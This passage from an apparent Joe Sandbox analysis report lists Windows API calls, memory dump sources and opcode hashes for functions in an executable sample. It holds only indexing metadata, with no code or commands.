                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog_swprintf
                                                                                                                    • String ID: CMT$h%u$hc%u
                                                                                                                    • API String ID: 146138363-3282847064
                                                                                                                    • Opcode ID: 9fd73c476415f385956742a049f50861e88d086e1366efad997dde1f25f265c0
                                                                                                                    • Instruction ID: 4d8cdb0732125165aecf4775753388cf9bdbb86b2d9b5c5f48732fac4fdccea3
                                                                                                                    • Opcode Fuzzy Hash: 9fd73c476415f385956742a049f50861e88d086e1366efad997dde1f25f265c0
                                                                                                                    • Instruction Fuzzy Hash: 9032E6B1510384ABEF58DF74C895AEA37E5AF15300F04547DFD8A8B283DB70AA49CB64
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00042874
                                                                                                                    • _strlen.LIBCMT ref: 00042E3F
                                                                                                                      • Part of subcall function 000502BA: __EH_prolog.LIBCMT ref: 000502BF
                                                                                                                      • Part of subcall function 00051B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0004BAE9,00000000,?,?,?,00010458), ref: 00051BA0
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00042F91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                    • String ID: CMT
                                                                                                                    • API String ID: 1206968400-2756464174
                                                                                                                    • Opcode ID: ee104d35592452eb4fc24442c086e2277d31ae9a90e8c4e86ec8912e276b1685
                                                                                                                    • Instruction ID: bc5bbfe8524f1c1315239dc2b7cd33c829f828ed43234149ec64afb21f66e2a3
                                                                                                                    • Opcode Fuzzy Hash: ee104d35592452eb4fc24442c086e2277d31ae9a90e8c4e86ec8912e276b1685
                                                                                                                    • Instruction Fuzzy Hash: 7C62F5B1A002449FDB19DF34C896AEA7BE1EF54300F08457EFC9A8B283DB759945CB64
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0005F844
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0005F910
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0005F930
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0005F93A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 254469556-0
                                                                                                                    • Opcode ID: f2992ebd710e3a8ec156ef07639d1f57beb6e6e63684d0b829fd7ddca3db5b18
                                                                                                                    • Instruction ID: 81b096659446db2f159ce15f311071027255c6aeb369f2d553f6129ba18c30f9
                                                                                                                    • Opcode Fuzzy Hash: f2992ebd710e3a8ec156ef07639d1f57beb6e6e63684d0b829fd7ddca3db5b18
                                                                                                                    • Instruction Fuzzy Hash: D3314B75D452199BEF11DFA4D9897CDBBF8AF04301F1040AAE40CA7250EB799B888F05
                                                                                                                    APIs
                                                                                                                    • VirtualQuery.KERNEL32(80000000,0005E5E8,0000001C,0005E7DD,00000000,?,?,?,?,?,?,?,0005E5E8,00000004,000A1CEC,0005E86D), ref: 0005E6B4
                                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0005E5E8,00000004,000A1CEC,0005E86D), ref: 0005E6CF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                                    • String ID: D
                                                                                                                    • API String ID: 401686933-2746444292
                                                                                                                    • Opcode ID: 65a619167d997f10466ea1c3e069de64b285360973bf7780d35110a7f60afb9e
                                                                                                                    • Instruction ID: ff8599617e5b3b856c3c2db2963bb762ae923b10637116a54bde67b7a1e97f43
                                                                                                                    • Opcode Fuzzy Hash: 65a619167d997f10466ea1c3e069de64b285360973bf7780d35110a7f60afb9e
                                                                                                                    • Instruction Fuzzy Hash: 7201F772A001496BDB18DE29DC09BDE7BEAAFC4325F0CC124ED59D7150E638DA458A80
                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00068FB5
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00068FBF
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00068FCC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3906539128-0
                                                                                                                    • Opcode ID: 7e26b3d839620acfd1fab7e7d0c4390c8b12a14cc8a5979d58157105ecd563d8
                                                                                                                    • Instruction ID: a74cb14919d6b891720d1a56e634a7c502ab2612a3c735c64c7d60a15c81d665
                                                                                                                    • Opcode Fuzzy Hash: 7e26b3d839620acfd1fab7e7d0c4390c8b12a14cc8a5979d58157105ecd563d8
                                                                                                                    • Instruction Fuzzy Hash: D431D674901219ABCB21DF24DC88BDDBBB8AF08310F5042EAE81CA7251EB749F858F55
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                    • Instruction ID: c6b1f4cd19567df40c06327fd09145cdff3a235b1f45d825a1a7209126330f88
                                                                                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                    • Instruction Fuzzy Hash: 12020D71E002199FDF14CFA9C9846ADB7F2EF48314F15816AD919EB385E731AE41CB90
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0005AF35
                                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,0007E72C,?,?), ref: 0005AF84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2169056816-0
                                                                                                                    • Opcode ID: 5764fc3acfdf832c6741a98da6fe4f25301537cb92b83c4915d48571e7629d76
                                                                                                                    • Instruction ID: 4ab1104002f5406e37dbff60470c0e89643f0ef297da0fc2ee465e1dad4ce2a2
                                                                                                                    • Opcode Fuzzy Hash: 5764fc3acfdf832c6741a98da6fe4f25301537cb92b83c4915d48571e7629d76
                                                                                                                    • Instruction Fuzzy Hash: A801717A500349AAE7109F65EC45F9B77BCFF09711F408022FA09E7150D3789954CBA5
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00046DDF,00000000,00000400), ref: 00046C74
                                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00046C95
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    • Opcode ID: fc8f510d1c74f9e5480d8fc1e35d83a7120096ca69d9e1478112318d629f4e08
                                                                                                                    • Instruction ID: 5ac93b5370a26274f056c2d83f4903ede06a32d2cbe31dc45642d0bec83d97bd
                                                                                                                    • Opcode Fuzzy Hash: fc8f510d1c74f9e5480d8fc1e35d83a7120096ca69d9e1478112318d629f4e08
                                                                                                                    • Instruction Fuzzy Hash: ABD0A970344300BFFA100BA18C46F2A3B98FF42B41F18C014B388E80E0DA798460B62A
                                                                                                                    APIs
                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000719EF,?,?,00000008,?,?,0007168F,00000000), ref: 00071C21
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaise
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3997070919-0
                                                                                                                    • Opcode ID: f38b6565f68e022843b6d60c32b8ebc9e399d3a5da718db0ca623c5e3c19e772
                                                                                                                    • Instruction ID: 18b34c2f8b70bf63ac470a18b83c12dfa581f8c77dc02f737e5bbc3c88701e2b
                                                                                                                    • Opcode Fuzzy Hash: f38b6565f68e022843b6d60c32b8ebc9e399d3a5da718db0ca623c5e3c19e772
                                                                                                                    • Instruction Fuzzy Hash: A8B10631A106099FD765CF2CC48ABA57BE0FB45364F29C658E899CF2E1C339E991CB44
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0005F66A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2325560087-0
                                                                                                                    • Opcode ID: e4eb339e611155ae0bea6fb5ef6e42b3797ab356ab4c161c1c52aaa231bb88ee
                                                                                                                    • Instruction ID: 53733a98afa5b3441256e6d731eac294623c237ab352181d06779f4b73aa0a1f
                                                                                                                    • Opcode Fuzzy Hash: e4eb339e611155ae0bea6fb5ef6e42b3797ab356ab4c161c1c52aaa231bb88ee
                                                                                                                    • Instruction Fuzzy Hash: F0516D75D0560A8FEB68CF68D8816BEBBF4FB48315F248579D805EB250D37CA944CB50
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0004B16B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Version
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1889659487-0
                                                                                                                    • Opcode ID: 35c3942101d0b6a62d91a27dbfbe0518de7f702fc87cf18ab6442f360dce18d7
                                                                                                                    • Instruction ID: c168382cad12e277be1eab5e9ef6c944b23666919a15a9a30c6a8b3e28fb59b4
                                                                                                                    • Opcode Fuzzy Hash: 35c3942101d0b6a62d91a27dbfbe0518de7f702fc87cf18ab6442f360dce18d7
                                                                                                                    • Instruction Fuzzy Hash: 08F01DB4D002588FEB18CB18EC956D973F9FF48315F1042A5D61993390C3B8A9C19FA5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: gj
                                                                                                                    • API String ID: 0-4203073231
                                                                                                                    • Opcode ID: b39f632174d6449c38caac12f98e41835d66be6676de361cf059543a5b39f843
                                                                                                                    • Instruction ID: 3f9be0a720f03813c153fb70a5dc39c2cf8283d5df5d35547d765f5d3672c0e2
                                                                                                                    • Opcode Fuzzy Hash: b39f632174d6449c38caac12f98e41835d66be6676de361cf059543a5b39f843
                                                                                                                    • Instruction Fuzzy Hash: 12C147B2A083818FD354CF29D88065AFBE1BFC8308F19892DE998D7311D734E944DB96
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0005F3A5), ref: 0005F9DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: 5883c01725a7caae4f5e4e5016fedaa85de373d44c0ad2a498f3b8ff35e7de1b
                                                                                                                    • Instruction ID: cd5f9ed9a1ab67c2a904c2cef2b235a257d2efe76b3d0d018cf36d9c2c7d0e49
                                                                                                                    • Opcode Fuzzy Hash: 5883c01725a7caae4f5e4e5016fedaa85de373d44c0ad2a498f3b8ff35e7de1b
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
